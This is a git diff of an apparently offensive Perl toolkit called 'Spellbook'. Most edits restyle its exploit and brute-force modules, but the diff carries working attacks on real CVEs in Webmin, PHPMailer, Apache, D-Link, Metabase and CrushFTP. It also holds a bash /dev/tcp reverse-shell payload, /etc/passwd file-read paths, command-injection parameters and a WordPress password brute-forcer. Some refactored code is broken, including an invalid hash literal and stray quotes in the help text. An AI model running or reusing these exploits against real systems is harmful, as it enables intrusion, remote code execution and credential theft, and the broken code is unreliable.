diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm
index 211e06a..90f5e12 100644
--- a/lib/Spellbook/Advisory/CVE_2006_3392.pm
+++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm
@@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 {
use strict;
use warnings;
use Spellbook::Core::UserAgent;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, $file);
@@ -15,24 +15,27 @@ package Spellbook::Advisory::CVE_2006_3392 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my $userAgent = Spellbook::Core::UserAgent -> new();
my $temp = "/..%01" x 40;
my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file);
-
- return $request -> content();
- }
+
+ return $request -> content();
+ }
if ($help) {
- return "
- \rExploit::CVE_2006_3392
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-f, --file Define a file to read\n\n";
+ return <<"EOT";
+
+Exploit::CVE_2006_3392
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-f, --file Define a file to read
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm
index 6c7a61f..a53742f 100644
--- a/lib/Spellbook/Advisory/CVE_2016_10045.pm
+++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm
@@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 {
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);
-
+
my $dir = "/var/www/html/uploads";
my %shell = (
"name" => "spellbook_xpl.php",
@@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 {
"S|shell=s" => \$shell{name},
"d|directory=s" => \$dir
);
-
+
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 {
$shell{code} = $code -> slurp();
}
-
+
my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com";
my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com";
-
+
try {
my $request = $userAgent -> post($target, [
"action" => "send",
@@ -62,13 +62,16 @@ package Spellbook::Advisory::CVE_2016_10045 {
}
if ($help) {
- return "
- \rExploit::CVE_2016_10045
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-S, --shell
- \r-d, --directory \n\n";
+ return<<"EOT";
+
+Exploit::CVE_2016_10045
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-S, --shell
+-d, --directory \n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm
index c10b3eb..4d2f6f3 100755
--- a/lib/Spellbook/Advisory/CVE_2017_5487.pm
+++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm
@@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 {
"t|target=s" => \$target
);
- if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
-
+
my $userAgent = Spellbook::Core::UserAgent -> new();
my $request = $userAgent -> get("$target/wp-json/wp/v2/users");
@@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 {
foreach my $data (@$content) {
my $username = $data -> {slug};
-
+
if ($username) {
push @result, $username;
}
- }
+ }
};
return @result;
@@ -42,14 +42,17 @@ package Spellbook::Advisory::CVE_2017_5487 {
}
if ($help) {
- return "
- \rExploit::CVE_2017_5487
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Exploit::CVE_2017_5487
+=======================
+-h, --help See this menu
+r-t, --target Define a target\n\n";
+
+EOT
}
- return 0;
+ return 0;
}
}
diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm
index 2eb317d..a07175f 100644
--- a/lib/Spellbook/Advisory/CVE_2020_9376.pm
+++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm
@@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 {
use warnings;
use Mojo::DOM;
use Spellbook::Core::UserAgent;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);
@@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
@@ -38,11 +38,14 @@ package Spellbook::Advisory::CVE_2020_9376 {
}
if ($help) {
- return "
- \rAdvisory::CVE_2020_9376
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target to exploit\n\n";
+ return<<"EOT";
+
+Advisory::CVE_2020_9376
+=======================
+-h, --help See this menu
+-t, --target Define a target to exploit\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm
index 5cac0b5..d5349b8 100644
--- a/lib/Spellbook/Advisory/CVE_2020_9377.pm
+++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm
@@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 {
use strict;
use warnings;
use Spellbook::Core::UserAgent;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, $cookie, $command, @results);
@@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
my $userAgent = Spellbook::Core::UserAgent -> new();
my $payload = "cmd=$command";
-
+
my $headers = HTTP::Headers -> new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=$cookie"
@@ -39,13 +39,16 @@ package Spellbook::Advisory::CVE_2020_9377 {
}
if ($help) {
- return "
- \rAdvisory::CVE_2020_9377
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-c, --cookie Define a session cookie
- \r-p, --payload Set the command to run on the target\n\n";
+ return<<"EOT";
+
+Advisory::CVE_2020_9377
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-c, --cookie Define a session cookie
+-p, --payload Set the command to run on the target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm
index ee0d49f..f3197ea 100644
--- a/lib/Spellbook/Advisory/CVE_2021_24891.pm
+++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm
@@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -44,11 +44,14 @@ package Spellbook::Advisory::CVE_2021_24891 {
}
if ($help) {
- return "
- \rAdvisory::CVE_2021_24891
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Advisory::CVE_2021_24891
+=======================
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm
index 3bbae0d..1fe890a 100644
--- a/lib/Spellbook/Advisory/CVE_2021_41773.pm
+++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm
@@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
if (!$file) { $file = "/etc/passwd"; }
my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/";
@@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 {
my $useragent = Spellbook::Core::UserAgent -> new();
my $request = $useragent -> get(
- "https://" . $target . $payload,
+ "https://" . $target . $payload,
Content => $command || " "
);
@@ -44,13 +44,16 @@ package Spellbook::Advisory::CVE_2021_41773 {
}
if ($help) {
- return "
- \rExploit::CVE_2021_41773
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-f, --file Define a file to read
- \r-c, --command Arbitrary code execution\n\n";
+ return<<"EOT";
+
+Exploit::CVE_2021_41773
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-f, --file Define a file to read
+-c, --command Arbitrary code execution\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm
index 8f69a94..59e4b58 100644
--- a/lib/Spellbook/Advisory/CVE_2023_29489.pm
+++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm
@@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 {
"t|target=s" => \$target
);
- if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my $userAgent = Spellbook::Core::UserAgent -> new();
my @payloads = (
@@ -39,14 +39,17 @@ package Spellbook::Advisory::CVE_2023_29489 {
}
if ($help) {
- return "
- \rExploit::CVE_2023_29489
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Exploit::CVE_2023_29489
+=======================
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
- return 0;
+ return 0;
}
}
diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm
index 2660ce3..966b399 100644
--- a/lib/Spellbook/Advisory/CVE_2023_38646.pm
+++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm
@@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
my $userAgent = Spellbook::Core::UserAgent -> new();
- my $request = $userAgent -> get("$target/api/session/properties");
+ my $initial_request = $userAgent -> get("$target/api/session/properties");
- if ($request -> code() == 200) {
+ if ($initial_request -> code() == 200) {
try {
- my $content = decode_json($request -> content);
+ my $content = decode_json($initial_request -> content);
my $token = $content -> {"setup-token"};
if ($token) {
my $headers = HTTP::Headers -> new ("Content-Type" => "application/json");
my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", "");
- my $payload = qq({
+ my $payload = {
"token": "$token",
"details": {
"is_on_demand": false,
@@ -57,10 +57,12 @@ package Spellbook::Advisory::CVE_2023_38646 {
"name": "an-sec-research-team",
"engine": "h2"
}
- });
+ };
- my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload);
- my $response = $userAgent -> request($request);
+ my $json_payload = encode_json($payload);
+
+ my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload);
+ my $response = $userAgent -> request($exploit_request);
if ($response -> code() == 400) {
push @result, "\n[+] $target exploited\n";
@@ -73,13 +75,16 @@ package Spellbook::Advisory::CVE_2023_38646 {
}
if ($help) {
- return "
- \rExploit::CVE_2023_38646
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-r, --remote Set the address to receive the reverse shell
- \r-p, --port Set the port of reverse shell\n\n";
+ return<<"EOT";
+
+Exploit::CVE_2023_38646
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-r, --remote Set the address to receive the reverse shell
+-p, --port Set the port of reverse shell\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm
index 336f0e4..c162fe7 100644
--- a/lib/Spellbook/Advisory/CVE_2024_4040.pm
+++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm
@@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 {
"payload=s" => \$payload,
"help" => \$help
);
-
+
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my $endpoint = "$target/WebInterface/";
my $userAgent = Spellbook::Core::UserAgent -> new();
my $cookie_jar = HTTP::Cookies -> new();
-
+
$userAgent -> cookie_jar($cookie_jar);
-
+
my $response = $userAgent -> post($endpoint);
$cookie_jar -> extract_cookies($response);
@@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 {
my $cookies = $response -> header("Set-Cookie");
- if ($cookies =~ /currentAuth=([^;]+)/x) {
- $response = $userAgent -> post($endpoint,
- Content_Type => "application/x-www-form-urlencoded",
+ if ($cookies =~ /currentAuth=([^;]+)/x) {
+ $response = $userAgent -> post($endpoint,
+ Content_Type => "application/x-www-form-urlencoded",
Content => "command=exists&paths=$payload&c2f=$1"
);
-
+
push @result, $response -> decoded_content();
}
@@ -49,12 +49,15 @@ package Spellbook::Advisory::CVE_2024_4040 {
}
if ($help) {
- return "
- \rAdvisory::CVE_2024_4040
- \r========================================
- \r-h, --help See this menu
- \r-u, --target Define the targeted CrushFTP server URL
- \r-p, --payload Set the payload to run on the target\n\n";
+ return<<"EOT";
+
+Advisory::CVE_2024_4040
+========================================
+-h, --help See this menu
+-u, --target Define the targeted CrushFTP server URL
+-p, --payload Set the payload to run on the target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm
index 489c545..5d29c85 100644
--- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm
+++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm
@@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]);
my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E";
my $userAgent = Spellbook::Core::UserAgent -> new();
@@ -31,16 +31,19 @@ package Spellbook::Advisory::Laravel_Ignition_XSS {
) {
push @results, $target;
}
-
+
return @results;
}
if ($help) {
- return "
- \rAdvisory::CVE_
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Advisory::CVE_
+=======================
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm
index 58745de..7250745 100755
--- a/lib/Spellbook/Android/APKSign.pm
+++ b/lib/Spellbook/Android/APKSign.pm
@@ -21,15 +21,18 @@ package Spellbook::Android::APKSign {
}
if ($help) {
- return "
- \rAndroid::APKSign
- \r================
- \r-h, --help See this menu
- \r-a, --apk Pass the APK file
- \r-n, --name Set de package name
- \r-p, --password Define a password\n";
+ return<<"EOT";
+
+Android::APKSign
+================
+-h, --help See this menu
+-a, --apk Pass the APK file
+-n, --name Set de package name
+-p, --password Define a password\n";
+
+EOT
}
-
+
return 0;
}
}
diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm
index 065953f..57fc37f 100755
--- a/lib/Spellbook/Android/Manifest.pm
+++ b/lib/Spellbook/Android/Manifest.pm
@@ -27,21 +27,27 @@ package Spellbook::Android::Manifest {
# Exported Android Components
# Access to protected intents via exported Activities
# Access to sensitive data via exported Activity
-
- return "
- \r[ - ] -> Package name: $package
- \r[ - ] -> Debug: $debug
- \r[ - ] -> Backup: $backup\n\n";
+
+ return join("\n",
+ "[ - ] -> Package name: $package",
+ "[ - ] -> Debug: $debug",
+ "[ - ] -> Backup: $backup",
+ "",
+ ""
+ );
}
if ($help) {
- return "
- \rAndroid::Manifest
- \r==============
- \r-h, --help See this menu
- \r-f, --file Pass the AndroidManifest.xml file\n\n";
+ return<<"EOT";
+
+Android::Manifest
+==============
+-h, --help See this menu
+-f, --file Pass the AndroidManifest.xml file\n\n";
+
+EOT
}
-
+
return 0;
}
}
diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm
index 3bb0b51..79cf20d 100755
--- a/lib/Spellbook/Android/Strings.pm
+++ b/lib/Spellbook/Android/Strings.pm
@@ -12,17 +12,20 @@ package Spellbook::Android::Strings {
# resources.arsc/strings.xml
# res/xml/file_paths.xml
-
+
# if (Dumper($data) =~ m/:\/\//) {
# return "true";
# }
}
if ($help) {
- return "
- \rAndroid::
- \r================
- \r-h, --help See this menu\n";
+ return<<"EOT";
+
+Android::
+================
+-h, --help See this menu\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm
index 7f291ef..004034b 100644
--- a/lib/Spellbook/Bruteforce/Facebook.pm
+++ b/lib/Spellbook/Bruteforce/Facebook.pm
@@ -1,7 +1,7 @@
package Spellbook::Bruteforce::Facebook {
use strict;
use warnings;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Facebook {
}
if ($help) {
- return "
- \rBruteforce::Facebook
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Bruteforce::Facebook
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm
index d1d5022..7f99fe3 100644
--- a/lib/Spellbook/Bruteforce/Instagram.pm
+++ b/lib/Spellbook/Bruteforce/Instagram.pm
@@ -18,15 +18,18 @@ package Spellbook::Bruteforce::Instagram {
if ($username) {
my $useragent = LWP::UserAgent -> new();
- }
+ }
if ($help) {
- return "
- \rExploit::Brute_Force_Instagram
- \r=======================
- \r-h, --help See this menu
- \r-u, --username Define a username
- \r-f, --file Define a file to read\n\n";
+ return<<"EOT";
+
+Exploit::Brute_Force_Instagram
+=======================
+-h, --help See this menu
+-u, --username Define a username
+-f, --file Define a file to read\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Bruteforce/Linkedin.pm b/lib/Spellbook/Bruteforce/LinkedIn.pm
similarity index 68%
rename from lib/Spellbook/Bruteforce/Linkedin.pm
rename to lib/Spellbook/Bruteforce/LinkedIn.pm
index d59352d..8b6a8e7 100644
--- a/lib/Spellbook/Bruteforce/Linkedin.pm
+++ b/lib/Spellbook/Bruteforce/LinkedIn.pm
@@ -1,7 +1,7 @@
package Spellbook::Bruteforce::LinkedIn {
use strict;
use warnings;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::LinkedIn {
}
if ($help) {
- return "
- \rBruteforce::LinkedIn
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Bruteforce::LinkedIn
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm
index 727b096..d976736 100644
--- a/lib/Spellbook/Bruteforce/SMTP.pm
+++ b/lib/Spellbook/Bruteforce/SMTP.pm
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::SMTP {
}
if ($help) {
- return "
- \rBruteforce::SMTP
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Bruteforce::SMTP
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm
index d094ea4..cd1b3ed 100644
--- a/lib/Spellbook/Bruteforce/Twitter.pm
+++ b/lib/Spellbook/Bruteforce/Twitter.pm
@@ -1,7 +1,7 @@
package Spellbook::Bruteforce::Twitter {
use strict;
use warnings;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Twitter {
}
if ($help) {
- return "
- \rBruteforce::Twitter
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Bruteforce::Twitter
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm
index b204b07..f19689e 100644
--- a/lib/Spellbook/Bruteforce/Wordpress.pm
+++ b/lib/Spellbook/Bruteforce/Wordpress.pm
@@ -3,6 +3,7 @@ package Spellbook::Bruteforce::Wordpress {
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
+ use Carp qw(croak);
# THIS IS A DRAFT MODULE
@@ -18,28 +19,32 @@ package Spellbook::Bruteforce::Wordpress {
);
if ($target) {
- open(my $wordlist, "<", "./files/rockyou.txt");
+ open(my $wordlist, "<", "./files/rockyou.txt")
+ or croak "Could not open wordlist file: $!";
+ my @passwords = <$wordlist>;
+ close($wordlist) or croak "Could not close wordlist file: $!";
- while (<$wordlist>) {
- chomp ($_);
+ chomp(@passwords);
+ foreach my $password (@passwords) {
my $useragent = LWP::UserAgent->new;
my $response = $useragent -> request(POST $target, [
log => $username,
- pwd => $_,
+ pwd => $password,
]);
if ($response -> is_success) {
- print "Successfully logged in with password: $_ \n";
+ print "Successfully logged in with password: $password \n";
+ last;
}
}
-
- close($wordlist);
}
if ($help) {
- return "";
+ return<<"EOT";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm
index f12d6e8..309d19f 100644
--- a/lib/Spellbook/Core/Credentials.pm
+++ b/lib/Spellbook/Core/Credentials.pm
@@ -15,14 +15,14 @@ package Spellbook::Core::Credentials {
"p|platform=s" => \$platform,
"v|value=s" => \$value,
);
-
+
if ($platform) {
my $credentials = Mojo::File -> new(".config/credentials.json");
my $data = $credentials -> slurp();
my $content = decode_json($data);
- if ($value) {
+ if ($value) {
$content -> {$platform} = $value;
$credentials -> spurt(encode_json($content));
}
@@ -31,14 +31,17 @@ package Spellbook::Core::Credentials {
}
if ($help) {
- return "
- \rCore::Credentials
- \r==============
- \r-h, --help See this menu
- \r-p, --platform Read some credentials filtering by platform
- \r-v, --value Define a value of a platform\n\n";
+ return<<"EOT";
+
+Core::Credentials
+==============
+-h, --help See this menu
+-p, --platform Read some credentials filtering by platform
+-v, --value Define a value of a platform\n\n";
+
+EOT
}
-
+
return 0;
}
}
diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm
index f50f568..e77fe88 100644
--- a/lib/Spellbook/Core/Helper.pm
+++ b/lib/Spellbook/Core/Helper.pm
@@ -3,17 +3,18 @@ package Spellbook::Core::Helper {
use warnings;
sub new {
- print "
- \rSpellbook v0.3.6
- \rCore Commands
- \r==============
- \r\tCommand Description
- \r\t------- -----------
- \r\t-s, --search List modules, you can filter by category
- \r\t-m, --module Define a module to use
- \r\t-h, --help To see help menu of a module\n\n";
-
- return 1;
+ return<<"EOT";
+
+Spellbook v0.3.6
+Core Commands
+==============
+Command Description
+------- -----------
+-s, --search List modules, you can filter by category
+-m, --module Define a module to use
+-h, --help To see help menu of a module\n\n";
+
+EOT
}
}
diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm
index cb54b7e..82b3a7f 100644
--- a/lib/Spellbook/Core/Module.pm
+++ b/lib/Spellbook/Core/Module.pm
@@ -2,20 +2,31 @@ package Spellbook::Core::Module {
use strict;
use warnings;
use Spellbook::Core::Resources;
+ use Carp qw(croak);
sub new {
my ($self, $module, @parameters) = @_;
- my $resources = Spellbook::Core::Resources -> new();
+ my $resources = Spellbook::Core::Resources->new();
- foreach my $package (@{$resources -> {modules}}) {
- my $category = ucfirst $package -> {category};
- my $name = $category . "::" . $package -> {module};
+ foreach my $package (@{$resources->{modules}}) {
+ my $category = ucfirst $package->{category};
+ my $name = $category . "::" . $package->{module};
- if ($name eq $module) {
- require "Spellbook/" . $category . "/" . $package -> {module} . ".pm";
+ if ($name eq $module) {
+ my $module_path = "Spellbook::" . $category . "::" . $package->{module};
- my @run = "Spellbook::$name" -> new(@parameters);
+ my $success = eval {
+ require Module::Load;
+ Module::Load::load($module_path);
+ 1;
+ };
+
+ if (!$success || $@) {
+ croak "Failed to load module $module_path: $@";
+ }
+
+ my @run = $module_path->new(@parameters);
my @results;
foreach my $result (@run) {
@@ -27,7 +38,7 @@ package Spellbook::Core::Module {
return @results;
}
}
-
+
return "\n[!] Module not found.\n\n";
}
}
diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm
index b4a8a63..0c1c112 100644
--- a/lib/Spellbook/Core/Orchestrator.pm
+++ b/lib/Spellbook/Core/Orchestrator.pm
@@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator {
use threads::shared;
use Spellbook::Helper::Read_File;
use List::MoreUtils qw(uniq);
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $wordlist, $module, $list, $queue);
my $threads = 10;
-
+
Getopt::Long::GetOptionsFromArray (
$parameters,
"h|help" => \$help,
@@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator {
$queue -> end();
my @results :shared;
-
+
async {
while (defined(my $target = $queue -> dequeue())) {
my @response = Spellbook::Core::Module -> new (
$module, [ "--target" => $target, @$parameters ]
);
-
+
lock(@results);
-
+
if (@response) {
push @results, @response;
}
}
- }
-
+ }
+
for 1 .. $threads;
- while (threads -> list(threads::running) > 0) {
+ while (threads -> list(threads::running) > 0) {
$_ -> join() for threads -> list(threads::all);
}
@@ -59,13 +59,16 @@ package Spellbook::Core::Orchestrator {
}
if ($help) {
- return "
- \rCore::Orchestrator
- \r==============
- \r\t-h, --help See this menu
- \r\t-t, --threads Number of threads
- \r\t-w, --wordlist Wordlist file
- \r\t-e, --entrypoint Module to execute\n\n";
+ return<<"EOT";
+
+Core::Orchestrator
+==============
+-h, --help See this menu
+-t, --threads Number of threads
+-w, --wordlist Wordlist file
+-e, --entrypoint Module to execute\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm
index 72fb36c..7dd342c 100644
--- a/lib/Spellbook/Exploit/CORS_Misconfig.pm
+++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm
@@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my $useragent = Spellbook::Core::UserAgent -> new ();
my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://"
foreach my $payload (@payloads) {
my $request = $useragent -> get($target, "Origin" => $payload);
my $header = $request -> header("access-control-allow-origin");
-
+
if ($header) {
if ($header eq $payload) {
push @results, $target;
@@ -36,11 +36,14 @@ package Spellbook::Exploit::CORS_Misconfig {
}
if ($help) {
- return "
- \rExploit::CORS_Misconfing
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Exploit::CORS_Misconfing
+=======================
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm
index c500fad..e68d700 100644
--- a/lib/Spellbook/Exploit/DataBreach.pm
+++ b/lib/Spellbook/Exploit/DataBreach.pm
@@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach {
use JSON;
use Spellbook::Core::UserAgent;
use Spellbook::Core::Credentials;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);
@@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach {
my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false";
my $useragent = Spellbook::Core::UserAgent -> new();
my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials);
-
+
if ($request -> code() == 200) {
my $data = decode_json($request -> decoded_content());
@@ -36,11 +36,14 @@ package Spellbook::Exploit::DataBreach {
}
if ($help) {
- return "
- \rExploit::Databreach
- \r==============
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Exploit::Databreach
+==============
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm
index 2949057..9102e89 100755
--- a/lib/Spellbook/Exploit/Django_DEBUG.pm
+++ b/lib/Spellbook/Exploit/Django_DEBUG.pm
@@ -1,4 +1,4 @@
-package Spellbook::Exploit::Django_Debug {
+package Spellbook::Exploit::Django_DEBUG {
use strict;
use warnings;
use Spellbook::Core::UserAgent;
@@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_Debug {
);
if ($target){
- if ($target !~ /^http(s)?:\/\//){
